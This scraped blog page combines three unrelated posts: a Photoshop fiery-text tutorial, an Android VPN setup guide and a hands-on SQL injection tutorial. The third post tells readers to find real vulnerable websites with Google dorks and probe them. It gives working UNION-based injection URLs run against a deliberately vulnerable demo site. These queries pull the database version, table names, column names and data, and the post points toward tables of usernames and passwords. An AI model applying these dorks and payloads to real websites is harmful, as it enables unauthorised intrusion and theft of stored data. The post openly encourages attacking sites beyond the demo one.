Breaking News
Loading...

Saturday, 26 March 2016

Create a Simple Fiery Text Effect in Photoshop

I’ll show, how to make this fiery text effect like in the hollywood posters. I’ll show how to transform stock images and how to play with blending options in Adobe Photoshop. You will learn, how to make simply background with gradient and grunge effect.

What you’ll be creating

You will create simply fiery text effect. You will start with making really hot shape of desired text, then You will add some stock images and You will create burning text effect. You will need Adobe Photoshop CS5  or newer.
final-results

Tutorial Resources

Step 1

Create new file, 1280×1024 size. Choose File > New (Ctrl + N).
step-001

Tutorial Resources

Step 1

Create new file, 1280×1024 size. Choose File > New (Ctrl + N).
step-001

Step 2

Place “texture-318913” stock to your file. Choose File > Place, select “texture-318913”, and transform it, then click Place.
step-002

Step 3

Create new adjustment layer (Layer > New Adjustment Layer > Brightness/Contrast) or use shortcut. Set Brightness to -125 and Contrast to -11. Click this layer with right mouse button and choose “Create Clipping Mask”.
step-003

Step 4

Create new adjustment layer (Layer > New Adjustment Layer > Levels or use shortcut). Set middle level to 0,52. Click this layer with right mouse button and choose “Create Clipping Mask”.
step-004

Step 5

Create new adjustment layer (Layer > New Adjustment Layer > Color Balance or use shortcut).
Set Shadows:
Cyan-Red +13
Magenta-Green -3
Yellow-Blue -13
Midtones:
Cyan-Red +34
Magenta-Green 0
Yellow-Blue -36
Highlights:
Cyan-Red +20
Magenta-Green 0
Yellow-Blue -37.
Click this layer with right mouse button and choose “Create Clipping Mask”.
step-005

Step 6

Click white canvas next to this layer (layer mask). Choose Gradient Tool (G) and pick radial gradient. Use black and white gradient in the layer mask:
step-006

Step 7

Duplicate “Color balance” layer. Drag it and drop to the Create a New Layer button or go to Layer > Duplicate layer. Decrease its opacity to 50%.
step-007

Step 8

Use Type tool and type your text. Use Trajan Pro 3 Bold font, 238,5 px. Use #ff6c24 color. Duplicate this text layer (Layer > Duplicate layer), then disable it.
step-008

Step 9

Click created text with right mouse button. Choose “Blending options…”. Choose “Inner glow”. Set blending mode to Screen, use #ffa024 color. Set elements size to 10px.
step-009

Step 10

Choose “Outer glow” and set its opacity to 36%. Change color of glow to #ff6c24. Set Elements size to 9px.
step-010

Step 11

Choose text layer. In layer box set fill to 0%.
step-011

Step 12

Below text layer, add new adjustment layer with solid color (Layer > New Fill Layer > Solid color), set #000 color.
step-012

Step 13

Select “Text” layer and “Solid Color” layer (Ctrl-click (Windows) or Command-click (Mac OS) them). Then click one of selected layers with right mouse button and choose “Convert to Smart Object”.
step-013

Step 14

Now choose Filter > Filter gallery… >. Choose Distort > Glass. Set Distortion to 6, Smoothness to 8. Use “Frosted” texture.

Step 15

Change blending mode to Screen.
step-015

Step 16

Duplicate this layer (Layer > Duplicate layer)..
step-016

Step 17

This step is optional. You’ll create bigger glow of your text. Duplicate “Text copy” layer, which You created in step 8. Drag it to the top of layers. Disable “Inner glow” and “Outer glow” (click an eye symbol).
step-017

Step 18

Then, click this layer with right mouse button. Choose “Blending options…”. Choose “Color overlay”, set #5f2409 color and change blending mode of overlay to Screen.
step-018

Step 19

Choose “Drop Shadow”. Change Structure blending mode to “Screen”, set color to #ffa71c, change its size to 57%.
step-019

Step 20

Now it’s the most boring part. You’ll create fiery shape. Place “Flames0027_1_M” to your file and transform it by using warp mode.
step-020

Step 21

Change blending mode to Screen.
step-021

Step 22

Place “Flames0027_10_M” to your file. Use warp mode and change blending mode to “Lighter Color”.
step-022

Step 23

lace “Flames0027_1_M”, use warp mode and change blending mode to “Screen”.
step-023

Step 24

Now “E” letter. Place “Flames0027_1_M”, apply transform and change blending mode to “Screen”.
step-024

Step 25

Duplicate this layer and transform (Ctrl + T) it.
step-025

Step 26

Place “Flames0027_10_M” to your file. Use warp mode and change blending mode to “Screen”.
step-026

Step 27

Place “Flames0027_12_M” to your file. Transform (Ctrl + T) it and change blending mode to “Screen”.
step-027

Step 28

Now “X” letter. Place “Flames0027_12_M” to your file. Use warp mode and change blending mode to “Screen”.
step-028

Step 29

Place “Flames0027_1_M”, use warp mode and change blending mode to “Screen”.

Step 30

Duplicate fiery layers with “T” letter. Select layers by holding down Ctrl (Windows) or Command (Mac OS). Drag it and drop to the Create a New Layer button. Drag duplicated layers to the top.
step-030

Step 31

Transform layers (ctrl+T). You are done! :)
step-031

Final Results

final-results

Download the PSD

Download

Fiery Text Effect.zip | 9.75 MB

Tutorial by computerinfotechwrld

Tuesday, 22 December 2015

Stay Anonymous Online - Setup A VPN On Android Device

setup-vpn-on-android- www.picateshackz.com

Android is open-source software and as with all open-source material, there are a lot of options and customization that can be created because the code is open for anyone to manipulate as they see fit. This comes with, of course, a major flaw… that flaw being that it’s easier to find ways to add malicious code and find “zero-day” exploits to read/steal data from the device. One thing that can help as far as sending and receiving data is a VPN. A VPN app encrypts one’s data transfers to safeguard against malicious “eyes.”


One should seriously consider using a Virtual Private Network (VPN) service if they perform below activities often from their mobile devices:

  • Using (open) public Wi-Fi (i.e. – from coffee shops, cafes, restaurants, etc.)
  • Performs online transactions (i.e. – online banking, paying bills, online shopping, money transfer, etc.)
  • Using one’s phone for emails, consistently.
  • Using Messenger, Hangouts, Skype calls on a regular basis.

Based upon a new poll, people prefer downloading a VPN application on their Android devices versus manually setting it up, because it saves time and energy. The Virtual Private Network application encrypts and re-routes information that is being received and sent from a device to protect you against the dirty tricks of online criminals and eavesdroppers.

Although we appreciate the difficult works of entrepreneurs who are applying all of their energies to ensure that our information is secure, it is always suggested that one goes for a VPN service that is hosted on a large scale and has positive reviews from reputable security websites.

In addition, most larger VPN providers offer custom VPN clients for mobile devices. However, there are several providers that have failed to catch up with the pace of the trade, and need efforts from our end to establish their clients’ connections using our cell phones. If you select a VPN provider that has no pre-built client, then one can always utilize these instructions for manual setup on their Android device(s).

First, select the process or the protocol you wish to configure your VPN to use. Here are the protocols supported by the Android OS:

PPTP
L2TP/IPSec (PSK)
L2TP/IPSec (RSA)
IPSec Xauth (PSK)
IPSec Xauth (RSA)
IPSec Hybrid (RSA)

Based on the protocol you want to take advantage of, ask your VPN service provider to provide you with the preceding details:


PPTP

a) DNS Search Domains
b) DNS Servers
c) Forwarding Routes


L2TP/IPSec (PSK)

a) Server Address
b) L2TP Secret
c) IPSec Identifier
d) IPSec Pre-Shared Key
e) DNS Search Domains
f) DNS Servers
g) Forwarding Routes


L2TP/IPSec (RSA)

a) Server Address
b) L2TP Secret
c) IPSec User Certificate
d) IPSec CA Certificate
e) IPSec Server Certificate
f) DNS Search Domains
g) DNS Servers
h) Forwarding Routers


IPSec Xauth (PSK)

a) Server Address
b) IPSec Identifier
c) IPSec Pre-Shared Key
d) DNS Search Domains
e) DNS Servers
f) Forwarding Routes


IPSec Xauth (RSA)

a) Server Address
b) IPSec User Certificate
c) IPSec CA Certificate
d) IPSec Server Certificate
e) DNS Search Domains
f) DNS Servers
g) Forwarding Routes


IPSec Hybrid (RSA)

a) Server Address
b) IPSec CA Certificate
c) IPSec Server Certificate
d) DNS Search Domains
e) DNS Servers
f) Forwarding Routes


NOTE: Your VPN provider may not support ALL of these protocols, however make sure you request these components, so the VPN provider is aware that they are not dealing with some kid who used his father’s credit card to buy something he possess no knowledge about.


Step 1: From your home screen, go to the app drawer and choose ‘Settings.’ You should see something similar to the screenshot below:


setup-vpn-on-android- www.picateshackz.com


step 2: Choose ‘More…’

step 3: 
Once inside ‘More,’ you will see ‘VPN’ as an option on the settings list. Touch it to take you to the profile page.

setup-vpn-on-android- www.picateshackz.com


step 4:
 At this point, you should be presented with a blank screen (may vary for different devices as the picture is of stock Android) with a ‘+’ sign at the top. Next to it is the “Options” menu, the place where you can add, edit, activate and remove VPN profiles and configurations.

setup-vpn-on-android- www.picateshackz.com


step 5: Click on the plus sign on the top right corner of the touch screen. Once you touch it, it lets you add a manual Virtual Private Network profile. (You can add multiple configurations by tapping the plus sign again after configuring your first profile.)

step 6: Once there, all you need to do is select the protocol that you wish to use.

setup-vpn-on-android- www.picateshackz.com


step 7: Once you have selected your desired protocol, tap the ‘Save’ option and it will take you back to the main page of the VPN settings screen, and your profile will be available to you on main VPN screen – in our case it’s titled, “Test.”

setup-vpn-on-android- www.picateshackz.com


step 8: Once that is done, click on the profile to enter further details… once you touch it, a pop-up will appear asking for a username, password and any other pertinent details based upon the protocol you chose – the VPN service provider will provide all of that data – and once all of the information is entered correctly you are ready to use your VPN!

setup-vpn-on-android- www.picateshackz.com


Remember! You can always edit or remove the VPN profile by touching the profile you wish to modify or want removed.

Manual SQL Injection - Basic Tutorial For Hack A Website

manual-sql-injection-hack-website- picateshackz.COM

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on 
How to Hack Website Using Sql Map in Kali Linux - Sql Injection


Finding A Vulnerable Website


The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google's "inurl" command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.
 inurl:"products.php?prodID="

 inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it's search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities


Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk ' at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID='
If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like "Not found","Table","Database","Row","Column","Sql","MysqL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.

manual-sql-injection-hack-website- picateshackz.COM
A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows


Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things

  • The site is vulnerable to SQL injection
  • It has 5 columns

Now you need to know which of the columns is vulnerable

Finding Vulnerable columns


Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.

Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used. 

Unification


From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. 

The website is: http://testphp.vulnweb.com/

The actual vulnerability is here: http://testphp.vulnweb.com/listproducts.php?cat=1

Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk '

manual-sql-injection-hack-website- picateshackz.COM

This is what you vulnerable page looks like to start with

manual-sql-injection-hack-website- picateshackz.COM
As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

manual-sql-injection-hack-website- picateshackz.COM
10 columns. Nothing so far.

manual-sql-injection-hack-website- picateshackz.COM
12 columns. Error....

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute -
 http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.
 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 

manual-sql-injection-hack-website- picateshackz.COM
Now we can see total four numbers on the page. 11,7,2 and 9. It won't be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

manual-sql-injection-hack-website- picateshackz.COM

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it's more about logic and creativity than it's about learning up useless code.

Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.

Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.
 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like

manual-sql-injection-hack-website- picateshackz.COM

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.

And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database


Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we're gonna look at first.

In our query which we used to find vulnerable columns (i.e.testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables

The final url will be

 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

manual-sql-injection-hack-website- picateshackz.COM

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables
 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

manual-sql-injection-hack-website- picateshackz.COM

We now have the names of all the tables. Here it is - 

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL

As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like 
+from+information_schema.tables+where+table_schema=database()

Obtaining columns


It is similar to obtaining tables, other than the fact that we will use information_schema.columns instead of information_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the tableevents (I've highlighted it above too). In hex it's code is 4556454e5453 (You can use text to hex converter - also prefix 0x behind the code before entering it). The final code will be-

 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

manual-sql-injection-hack-website- picateshackz.COM
We now know the columns of the table events

Extracting data from columns


We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-

 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS 

manual-sql-injection-hack-website- picateshackz.COM
The page didn't display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you. 

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first columnCHARACTER_SET_NAME. Now finally we have the final code as-
 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

manual-sql-injection-hack-website- picateshackz.COM
This table has a lot of data, and we have all the character_sets name.
So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like 'USERS' and the columns have name 'USERNAME' and 'PASSWORD'. I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.
 http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

manual-sql-injection-hack-website- picateshackz.COM

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.